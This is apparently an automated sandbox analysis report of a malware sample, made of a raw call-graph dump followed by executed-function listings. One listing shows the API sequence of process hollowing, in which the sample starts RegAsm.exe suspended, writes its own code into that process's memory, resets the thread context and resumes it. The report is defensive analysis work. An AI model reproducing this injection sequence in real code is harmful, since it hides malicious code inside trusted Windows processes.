f66b04 5835->5940 5930 f63ed8 5836->5930 5840 f63afc 5843 f8da10 __Getctype 5 API calls 5840->5843 5841 f63adc _Deallocate 5841->5840 5842 f65bce _Deallocate 3 API calls 5841->5842 5842->5840 5844 f63b0b 5843->5844 5845 f63663 5844->5845 5991 f65bfa 5845->5991 5848 f63685 5857 f636c0 5848->5857 5994 f651f4 5848->5994 6002 f653b4 5848->6002 5850 f6372a OffsetRect 6009 f669f0 5850->6009 5853 f646fa 4 API calls 5853->5857 5855 f64859 IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 5855->5857 5856 f64c6d 3 API calls 5856->5857 5857->5850 5857->5853 5857->5855 5857->5856 5859 f63830 5857->5859 6019 f6692c 5857->6019 6029 f655d4 5857->6029 6033 f6487f 5857->6033 5860 f8da10 __Getctype 5 API calls 5859->5860 5861 f6384e 5860->5861 5861->5802 5863 f63b8e 5862->5863 5864 f64c78 5862->5864 5866 f8da10 5863->5866 5865 f65bce _Deallocate 3 API calls 5864->5865 5865->5863 5867 f8da18 5866->5867 5868 f8da19 IsProcessorFeaturePresent 5866->5868 5867->5806 5870 f8e861 5868->5870 6368 f8e824 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5870->6368 5872 f8e944 5872->5806 5874 f659b9 5873->5874 5877 f6595f 5873->5877 5888 f61511 5874->5888 5879 f65966 5877->5879 5880 f66d09 5877->5880 5879->5810 5881 f66d14 5880->5881 5882 f66d1c 5880->5882 5891 f673e2 5881->5891 5884 f66d28 5882->5884 5885 f8db27 std::_Facet_Register RaiseException 5882->5885 5884->5879 5887 f66d26 5885->5887 5886 f66d1a 5886->5879 5887->5879 5907 f69e64 5888->5907 5892 f673f1 5891->5892 5893 f6148c 5891->5893 5894 f8db27 std::_Facet_Register RaiseException 5892->5894 5901 f90044 5893->5901 5895 f673f7 _Deallocate 5894->5895 5896 f673fe 5895->5896 5904 fb8595 IsProcessorFeaturePresent 5895->5904 5896->5886 5898 f614a8 Concurrency::cancel_current_task 5898->5886 5900 fb8594 5902 f9008b RaiseException 5901->5902 5903 f9005e 5901->5903 5902->5898 5903->5902 5905 fb85a1 5904->5905 5906 fb85b6 GetCurrentProcess TerminateProcess 5905->5906 5906->5900 5908 f69e75 std::invalid_argument::invalid_argument 5907->5908 5909 f90044 Concurrency::cancel_current_task RaiseException 5908->5909 5910 f69e83 std::invalid_argument::invalid_argument 5909->5910 5911 f90044 Concurrency::cancel_current_task RaiseException 5910->5911 5912 f69ea3 std::invalid_argument::invalid_argument 5911->5912 5913 f90044 Concurrency::cancel_current_task RaiseException 5912->5913 5914 f69ec3 std::regex_error::regex_error 5913->5914 5915 f90044 Concurrency::cancel_current_task RaiseException 5914->5915 5916 f69ee3 5915->5916 5918 f6395f 5917->5918 5919 f6483b 5917->5919 5918->5822 5921 f65bce 5919->5921 5922 f65be8 _Deallocate 5921->5922 5923 f65bdb 5921->5923 5922->5918 5925 f614de 5923->5925 5926 f614fb _Deallocate 5925->5926 5927 f614f8 5925->5927 5928 fb8595 __Getctype 3 API calls 5926->5928 5927->5922 5929 fb8594 5928->5929 5950 f656a5 5930->5950 5932 f63ad7 5933 f635cf 5932->5933 5934 f63655 5933->5934 5939 f635e0 5933->5939 5983 f648c2 5934->5983 5937 f651f4 9 API calls 5937->5939 5938 f653b4 65 API calls 5938->5939 5939->5934 5939->5937 5939->5938 5941 f66b10 __EH_prolog3_catch 5940->5941 5942 f66ba3 5941->5942 5943 f66b29 5941->5943 5944 f6653b 4 API calls 5942->5944 5946 f6707e 4 API calls 5943->5946 5945 f66ba8 5944->5945 5945->5835 5947 f66b3c 5946->5947 5987 f6701c 5947->5987 5949 f66b85 __Getctype 5949->5835 5951 f656af 5950->5951 5953 f656bb 5950->5953 5954 f6602e 5951->5954 5953->5932 5955 f66054 5954->5955 5956 f6603e 5954->5956 5974 f6653b 5955->5974 5961 f6707e 5956->5961 5959 f66044 5959->5953 5962 f67096 5961->5962 5963 f67089 5961->5963 5979 f6148c 5962->5979 5964 f66d09 4 API calls 5963->5964 5966 f67092 5964->5966 5966->5959 5967 f6709b 5968 f670a7 5967->5968 5969 f670b4 5967->5969 5971 f66d09 4 API calls 5968->5971 5970 f6148c Concurrency::cancel_current_task RaiseException 5969->5970 5973 f670b9 5970->5973 5972 f670b0 5971->5972 5972->5959 5973->5959 5975 f69e64 std::_Xinvalid_argument RaiseException 5974->5975 5976 f66545 5975->5976 5977 f6707e 4 API calls 5976->5977 5978 f66059 5977->5978 5978->5953 5980 f6149a 5979->5980 5981 f90044 Concurrency::cancel_current_task RaiseException 5980->5981 5982 f614a8 Concurrency::cancel_current_task 5981->5982 5982->5967 5984 f6365e 5983->5984 5985 f648ca 5983->5985 5984->5841 5986 f65bce _Deallocate 3 API calls 5985->5986 5986->5984 5988 f67034 5987->5988 5989 f67024 5987->5989 5988->5949 5990 f65bce _Deallocate 3 API calls 5989->5990 5990->5988 5992 f8db27 std::_Facet_Register RaiseException 5991->5992 5993 f65c01 5992->5993 5993->5848 5996 f65200 __EH_prolog3_catch _strlen 5994->5996 6037 f65d92 5996->6037 5998 f6539e 6048 f65d77 5998->6048 6000 f653a6 __Getctype 6000->5848 6001 f65264 6041 f61fd3 6001->6041 6121 f65fca 6002->6121 6004 f653cd 6125 f65f0a 6004->6125 6006 f653d8 6007 f65e4c 9 API calls 6006->6007 6008 f653df 6007->6008 6008->5848 6010 f669fc __EH_prolog3_catch 6009->6010 6011 f66a16 6010->6011 6012 f66a98 6010->6012 6015 f66d09 4 API calls 6011->6015 6349 f66f96 6012->6349 6016 f66a29 6015->6016 6345 f66fa1 6016->6345 6018 f66a79 __Getctype 6018->5857 6020 f66938 __EH_prolog3_catch 6019->6020 6021 f66951 6020->6021 6022 f669cb 6020->6022 6352 f6763b 6021->6352 6365 f66f20 6022->6365 6026 f66964 6361 f66f2b 6026->6361 6028 f669ad __Getctype 6028->5857 6030 f655f1 6029->6030 6031 f655de 6029->6031 6032 f6692c 4 API calls 6030->6032 6031->5857 6032->6031 6034 f64887 6033->6034 6035 f64894 6033->6035 6036 f65bce _Deallocate 3 API calls 6034->6036 6035->5857 6036->6035 6039 f65da7 6037->6039 6038 f65dc5 6038->6001 6039->6038 6052 f65e4c 6039->6052 6042 f6202e 6041->6042 6045 f61fea 6041->6045 6042->5998 6043 f62023 6044 f90044 Concurrency::cancel_current_task RaiseException 6043->6044 6046 f6203c 6044->6046 6045->6043 6060 f61fa8 6045->6060 6046->5998 6049 f65d7f 6048->6049 6050 f65d8a 6049->6050 6117 f664bc 6049->6117 6050->6000 6053 f65e58 __EH_prolog3_catch 6052->6053 6054 f65efd __Getctype 6053->6054 6055 f65d92 9 API calls 6053->6055 6054->6038 6058 f65e77 6055->6058 6056 f65ef5 6057 f65d77 9 API calls 6056->6057 6057->6054 6058->6056 6059 f61fd3 9 API calls 6058->6059 6059->6056 6063 f618aa 6060->6063 6064 f646fa 4 API calls 6063->6064 6065 f618ce 6064->6065 6072 f617ed 6065->6072 6068 f64c6d 3 API calls 6069 f618e9 6068->6069 6070 f8da10 __Getctype 5 API calls 6069->6070 6071 f618fd 6070->6071 6071->6043 6081 f64753 6072->6081 6076 f6181d 6077 f64c6d 3 API calls 6076->6077 6078 f61830 6077->6078 6079 f8da10 __Getctype 5 API calls 6078->6079 6080 f6184f 6079->6080 6080->6068 6082 f64773 6081->6082 6097 f659bf 6082->6097 6084 f6180e 6085 f61705 6084->6085 6086 f61720 _strlen 6085->6086 6087 f61736 6085->6087 6104 f64cf7 6086->6104 6089 f64cf7 4 API calls 6087->6089 6090 f6175c 6089->6090 6091 f64c6d 3 API calls 6090->6091 6092 f61764 6091->6092 6093 f64c6d 3 API calls 6092->6093 6094 f61777 6093->6094 6095 f8da10 __Getctype 5 API calls 6094->6095 6096 f61785 6095->6096 6096->6076 6098 f65a21 6097->6098 6101 f659d0 6097->6101 6099 f61511 RaiseException 6098->6099 6100 f65a26 6099->6100 6100->6084 6102 f659d7 6101->6102 6103 f66d09 4 API calls 6101->6103 6102->6084 6103->6102 6105 f64d37 6104->6105 6107 f64d0d 6104->6107 6108 f65b2c 6105->6108 6107->6087 6109 f65b45 6108->6109 6110 f65bb1 6108->6110 6113 f66d09 4 API calls 6109->6113 6111 f61511 RaiseException 6110->6111 6112 f65bb6 6111->6112 6112->6107 6114 f65b64 6113->6114 6115 f65bce _Deallocate 3 API calls 6114->6115 6116 f65b96 6114->6116 6115->6116 6116->6107 6119 f664c8 __EH_prolog3_catch 6117->6119 6118 f66504 __Getctype 6118->6050 6119->6118 6120 f61fd3 9 API calls 6119->6120 6120->6118 6122 f65fde 6121->6122 6133 f65030 6122->6133 6124 f65fe7 6124->6004 6126 f65f16 __EH_prolog3_catch 6125->6126 6127 f65d92 9 API calls 6126->6127 6128 f65f28 6127->6128 6129 f61fd3 9 API calls 6128->6129 6130 f65fb3 6129->6130 6131 f65d77 9 API calls 6130->6131 6132 f65fbb __Getctype 6131->6132 6132->6006 6148 f6960b 6133->6148 6137 f65054 6138 f65067 6137->6138 6160 f61e07 6137->6160 6173 f69672 6138->6173 6141 f6509d 6141->6124 6143 f650a3 6180 f61a9c 6143->6180 6144 f6507e 6170 f6b8b9 6144->6170 6147 f650a8 6147->6124 6149 f6961a 6148->6149 6151 f69621 6148->6151 6184 fb86cc 6149->6184 6152 f65041 6151->6152 6187 f6c783 EnterCriticalSection 6151->6187 6154 f61c6b 6152->6154 6155 f61c77 6154->6155 6156 f61c9b 6154->6156 6157 f6960b std::_Lockit::_Lockit 6 API calls 6155->6157 6156->6137 6158 f61c81 6157->6158 6159 f69672 std::_Lockit::~_Lockit 2 API calls 6158->6159 6159->6156 6161 f61e15 6160->6161 6169 f61e4a 6160->6169 6162 f8db27 std::_Facet_Register RaiseException 6161->6162 6161->6169 6163 f61e22 6162->6163 6239 f61b73 6163->6239 6169->6143 6169->6144 6171 f8db27 std::_Facet_Register RaiseException 6170->6171 6172 f6b8c4 6171->6172 6172->6138 6174 fb86da 6173->6174 6175 f6967c 6173->6175 6344 fb86b5 LeaveCriticalSection 6174->6344 6176 f6968f 6175->6176 6343 f6c791 LeaveCriticalSection 6175->6343 6176->6141 6179 fb86e1 6179->6141 6181 f61aaa Concurrency::cancel_current_task 6180->6181 6182 f90044 Concurrency::cancel_current_task RaiseException 6181->6182 6183 f61ab8 Concurrency::cancel_current_task 6182->6183 6183->6147 6188 fcb770 6184->6188 6187->6152 6209 fcaa9c 6188->6209 6208 fcb7a2 6208->6208 6210 fcae73 __Getctype 5 API calls 6209->6210 6211 fcaab2 6210->6211 6212 fcaab6 6211->6212 6213 fcae73 __Getctype 5 API calls 6212->6213 6214 fcaacc 6213->6214 6215 fcaad0 6214->6215 6216 fcae73 __Getctype 5 API calls 6215->6216 6217 fcaae6 6216->6217 6218 fcab6c 6217->6218 6219 fcae73 __Getctype 5 API calls 6218->6219 6220 fcab82 6219->6220 6221 fcabba 6220->6221 6222 fcae73 __Getctype 5 API calls 6221->6222 6223 fcabd0 6222->6223 6224 fcac08 6223->6224 6225 fcae73 __Getctype 5 API calls 6224->6225 6226 fcac1e 6225->6226 6227 fcac22 6226->6227 6228 fcae73 __Getctype 5 API calls 6227->6228 6229 fcac38 6228->6229 6230 fcac8a 6229->6230 6231 fcae73 __Getctype 5 API calls 6230->6231 6232 fcaca0 6231->6232 6233 fcacbe 6232->6233 6234 fcae73 __Getctype 5 API calls 6233->6234 6235 fcacd4 6234->6235 6236 fcaca4 6235->6236 6237 fcae73 __Getctype 5 API calls 6236->6237 6238 fcacba 6237->6238 6238->6208 6240 f6960b std::_Lockit::_Lockit 6 API calls 6239->6240 6241 f61b7f 6240->6241 6242 f61bc0 6241->6242 6243 f61bad 6241->6243 6259 f69ee4 6242->6259 6254 f6b9e9 6243->6254 6246 f61bb7 6248 f61dd4 6246->6248 6291 f6bfa3 6248->6291 6251 f61bcb 6339 f6ba34 6251->6339 6253 f61bd5 _Yarn 6263 fba552 6254->6263 6256 f6b9f5 _Yarn 6257 fba552 std::_Locinfo::_Locinfo_ctor 61 API calls 6256->6257 6258 f6ba1d _Yarn 6256->6258 6257->6258 6258->6246 6260 f69ef5 6259->6260 6261 f90044 Concurrency::cancel_current_task RaiseException 6260->6261 6262 f61bca 6261->6262 6264 fcb770 std::_Locinfo::_Locinfo_ctor 5 API calls 6263->6264 6265 fba55f 6264->6265 6268 fba1f9 6265->6268 6269 fba205 6268->6269 6274 fba2e8 6269->6274 6271 fba220 6288 fba248 6271->6288 6275 fba4b7 std::_Locinfo::_Locinfo_ctor 61 API calls 6274->6275 6276 fba303 6275->6276 6277 fcc3e7 __Getctype 25 API calls 6276->6277 6287 fba34e 6276->6287 6278 fba310 6277->6278 6279 fd19ee std::_Locinfo::_Locinfo_ctor 34 API calls 6278->6279 6280 fba335 6279->6280 6284 fd19ee std::_Locinfo::_Locinfo_ctor 34 API calls 6280->6284 6286 fba33c 6280->6286 6280->6287 6281 fb8595 __Getctype IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 6282 fba446 6281->6282 6283 fb86b5 std::_Lockit::~_Lockit LeaveCriticalSection 6282->6283 6285 fba44e 6283->6285 6284->6286 6285->6271 6286->6281 6286->6287 6287->6271 6289 fb86b5 std::_Lockit::~_Lockit LeaveCriticalSection 6288->6289 6290 fba231 6289->6290 6290->6256 6303 fbbd39 6291->6303 6293 f6bfac __Getctype 6294 f6bfc6 6293->6294 6295 f6bfe4 6293->6295 6308 fba7fb 6294->6308 6297 fba7fb __Getctype 25 API calls 6295->6297 6298 f6bfcd 6297->6298 6313 fbbd83 6298->6313 6301 f61df4 6301->6251 6304 fcc3e7 __Getctype 25 API calls 6303->6304 6305 fbbd44 6304->6305 6325 fcca09 6305->6325 6309 fcc3e7 __Getctype 25 API calls 6308->6309 6310 fba806 6309->6310 6311 fcca09 __Getctype 25 API calls 6310->6311 6312 fba816 6311->6312 6312->6298 6314 fcc3e7 __Getctype 25 API calls 6313->6314 6315 fbbd8e 6314->6315 6316 fcca09 __Getctype 25 API calls 6315->6316 6317 f6bff5 6316->6317 6317->6301 6318 fbc267 6317->6318 6319 fbc2af 6318->6319 6320 fbc274 __Getctype 6318->6320 6319->6301 6320->6319 6321 fb8595 __Getctype 3 API calls 6320->6321 6322 fbc2c5 __Getctype 6321->6322 6324 fbc2d5 __Getctype 6322->6324 6329 fd2173 6322->6329 6324->6301 6326 fcca1c 6325->6326 6327 fbbd54 6325->6327 6326->6327 6328 fd8471 __Getctype 25 API calls 6326->6328 6327->6293 6328->6327 6330 fd21ac __Getctype 6329->6330 6332 fd21d3 __Getctype 6330->6332 6335 fd25f2 6330->6335 6333 f8da10 __Getctype 5 API calls 6332->6333 6334 fd223a 6333->6334 6334->6324 6336 fd261d __Getctype 6335->6336 6337 fd2816 RaiseException 6336->6337 6338 fd282f 6337->6338 6338->6332 6340 f6ba40 6339->6340 6342 f6ba4a 6339->6342 6341 fba552 std::_Locinfo::_Locinfo_ctor 61 API calls 6340->6341 6341->6342 6342->6253 6343->6176 6344->6179 6346 f66fb6 6345->6346 6347 f66fa9 6345->6347 6346->6018 6348 f65bce _Deallocate 3 API calls 6347->6348 6348->6346 6350 f69e64 std::_Xinvalid_argument RaiseException 6349->6350 6351 f66fa0 6350->6351 6353 f67646 6352->6353 6354 f67653 6352->6354 6355 f66d09 4 API calls 6353->6355 6356 f6148c Concurrency::cancel_current_task RaiseException 6354->6356 6357 f6764f 6355->6357 6358 f67658 6356->6358 6357->6026 6359 f66d09 4 API calls 6358->6359 6360 f67662 6359->6360 6360->6026 6362 f66f43 6361->6362 6363 f66f33 6361->6363 6362->6028 6364 f65bce _Deallocate 3 API calls 6363->6364 6364->6362 6366 f69e64 std::_Xinvalid_argument RaiseException 6365->6366 6367 f66f2a 6366->6367 6368->5872 6532 fca220 6533 fca22c 6532->6533 6536 fca29b 6533->6536 6539 fb86b5 LeaveCriticalSection 6536->6539 6538 fca28d 6539->6538 6540 fe4a80 6541 f8da10 __Getctype 5 API calls 6540->6541 6542 fe4a93 6541->6542

                                                                                      Executed Functions

                                                                                      Function 001E018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,001E00FF,001E00EF), ref: 001E02FC
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001E030F
                                                                                      • Wow64GetThreadContext.KERNEL32(00000110,00000000), ref: 001E032D
                                                                                      • ReadProcessMemory.KERNELBASE(00000114,?,001E0143,00000004,00000000), ref: 001E0351
                                                                                      • VirtualAllocEx.KERNELBASE(00000114,?,?,00003000,00000040), ref: 001E037C
                                                                                      • WriteProcessMemory.KERNELBASE(00000114,00000000,?,?,00000000,?), ref: 001E03D4
                                                                                      • WriteProcessMemory.KERNELBASE(00000114,00400000,?,?,00000000,?,00000028), ref: 001E041F
                                                                                      • WriteProcessMemory.KERNELBASE(00000114,?,?,00000004,00000000), ref: 001E045D
                                                                                      • Wow64SetThreadContext.KERNEL32(00000110,001F0000), ref: 001E0499
                                                                                      • ResumeThread.KERNELBASE(00000110), ref: 001E04A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1674829956.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1e0000_kWYLtJ0Cn1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                      • API String ID: 2687962208-1257834847
                                                                                      • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                      • Instruction ID: 82b35dcfc36c2a2bd7d95e938c269e2015ece6127bad23bd624aca1c8bad59d8
                                                                                      • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                      • Instruction Fuzzy Hash: 97B1E57260068AAFDB60CF69CC80BDA77A5FF8C714F158524EA0CAB341D774FA418B94
                                                                                      Function 00FCC90D Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 187 fcc90d-fcc925 GetPEB 188 fcc936-fcc938 187->188 189 fcc927-fcc92b call fcafd3 187->189 190 fcc939-fcc93d 188->190 192 fcc930-fcc934 189->192 192->188 192->190
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9d4e2dfcbfd14504dd5c583896d366168cbc076de7f7db6caaae018fb7c7fb6
                                                                                      • Instruction ID: 74d1b713fd6930c44268dff3195cdfb3d9c3fab6129be7d808b86ec3a68053c5
                                                                                      • Opcode Fuzzy Hash: d9d4e2dfcbfd14504dd5c583896d366168cbc076de7f7db6caaae018fb7c7fb6
                                                                                      • Instruction Fuzzy Hash: 89E08C72911238EBCB25DF88CA05E8AF7ECEB88B10B15419AF605D3100C374DE00E7D0
                                                                                      Function 00FC6108 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 193 fc6108 call fcc90d 195 fc610d-fc6110 193->195 196 fc6127-fc6129 195->196 197 fc6112-fc6122 GetPEB 195->197 197->196 198 fc6124-fc6126 197->198
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1de4bcb73b141b582b0cb571b4a911e1f54f3f8ffa2eb27b21d741e3114bb213
                                                                                      • Instruction ID: 61154a14019e07ba96e5a34c32b0998e4bdf3ad97dc350c72c3d265b29a556a6
                                                                                      • Opcode Fuzzy Hash: 1de4bcb73b141b582b0cb571b4a911e1f54f3f8ffa2eb27b21d741e3114bb213
                                                                                      • Instruction Fuzzy Hash: A4C08C7840098147CE298D109B73FE63754A391F9BF8824CCC4078BE43C52E9C82FA00
                                                                                      Function 00FCADA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 23 fcada8-fcadb4 24 fcae46-fcae49 23->24 25 fcae4f 24->25 26 fcadb9-fcadca 24->26 27 fcae51-fcae55 25->27 28 fcadcc-fcadcf 26->28 29 fcadd7-fcadf0 LoadLibraryExW 26->29 30 fcae6f-fcae71 28->30 31 fcadd5 28->31 32 fcae56-fcae66 29->32 33 fcadf2-fcadfb GetLastError 29->33 30->27 35 fcae43 31->35 32->30 34 fcae68-fcae69 FreeLibrary 32->34 36 fcadfd-fcae0f call fca0d8 33->36 37 fcae34-fcae41 33->37 34->30 35->24 36->37 40 fcae11-fcae23 call fca0d8 36->40 37->35 40->37 43 fcae25-fcae32 LoadLibraryExW 40->43 43->32 43->37
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00FCAEB5,?,00000000,00F63ADC,00000001,00000000,?,00FCAAB2,00000000,AreFileApisANSI,00FEE6A4,AreFileApisANSI,00FCB775,00FB86D1), ref: 00FCAE69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 0d8c0748c61be8552a54676ca254534fc5613ee4e19e71b15f6c63e1c9c51789
                                                                                      • Instruction ID: f1049ba1c5d6761554e1116c21ded671faee7310317fdc9db0da7632ab717c51
                                                                                      • Opcode Fuzzy Hash: 0d8c0748c61be8552a54676ca254534fc5613ee4e19e71b15f6c63e1c9c51789
                                                                                      • Instruction Fuzzy Hash: 08216D32E0121BA7CB218B22ED86F9A3728AF41778F150128F915A72C0D734FD00F6D2
                                                                                      Function 00FC608B Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00FC6085,00FE7ED4,?,?,?,29949A30), ref: 00FC609C
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00FC6085,00FE7ED4,?,?,?,29949A30), ref: 00FC60A3
                                                                                      • ExitProcess.KERNEL32 ref: 00FC60B5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 5d8f3f2858a1a34d08a3c49ec5615569eac6121fc8d9914bff780e9be8939d47
                                                                                      • Instruction ID: fa965bea1e1e50730285faf06bc6002091f983139abb1b580129fa6323936caa
                                                                                      • Opcode Fuzzy Hash: 5d8f3f2858a1a34d08a3c49ec5615569eac6121fc8d9914bff780e9be8939d47
                                                                                      • Instruction Fuzzy Hash: 60D09E3140814ABFCF112F61DD4FD893F29EF417567058059B90999032DF799952FA90
                                                                                      Function 00F63B0D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00F646FA: _strlen.LIBCMT ref: 00F64712
                                                                                      • VirtualAllocEx.KERNELBASE(000000FF,00000000,000004AC,00001000,00000040,?,0000000006:1@0000000005:@), ref: 00F63B50
                                                                                        • Part of subcall function 00F63A4A: _Deallocate.LIBCONCRT ref: 00F63AF7
                                                                                        • Part of subcall function 00F63663: OffsetRect.USER32(00000000,00000000,00000000), ref: 00F63734
